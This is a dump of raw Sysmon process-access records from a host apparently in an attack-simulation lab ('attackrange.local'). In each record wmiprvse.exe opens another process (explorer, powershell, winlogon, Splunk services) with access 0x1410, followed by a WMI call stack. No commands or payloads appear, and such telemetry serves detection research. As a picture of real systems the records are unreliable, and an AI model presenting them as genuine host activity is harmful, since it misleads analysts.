15:59:44.709{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5353-6008-2F06-00000000A301}3716C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027611Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:44.709{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4405-00000000A301}7000C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027610Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:44.709{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4305-00000000A301}7420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027609Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:44.709{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4DC0-6008-FB02-00000000A301}8056C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027608Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:44.709{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A9B-6008-1501-00000000A301}6076C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027607Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:44.709{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A99-6008-1401-00000000A301}5960C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027606Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:44.709{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027605Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:44.709{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FF00-00000000A301}4808C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027604Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:44.709{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FC00-00000000A301}5008C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027603Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:44.709{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F600-00000000A301}1548C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027602Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:44.709{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F300-00000000A301}4180C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027601Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:44.694{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A27-6008-E400-00000000A301}2860C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027600Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:44.694{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A22-6008-DB00-00000000A301}4244C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027599Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:44.694{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A1A-6008-B100-00000000A301}2640C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027598Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:44.694{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027597Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:44.694{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A11-6008-9600-00000000A301}4612C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027596Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:44.694{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8200-00000000A301}4876C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027595Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:44.694{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8100-00000000A301}4864C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027594Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:44.694{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7F00-00000000A301}4328C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027593Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:44.694{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7E00-00000000A301}4316C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027592Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 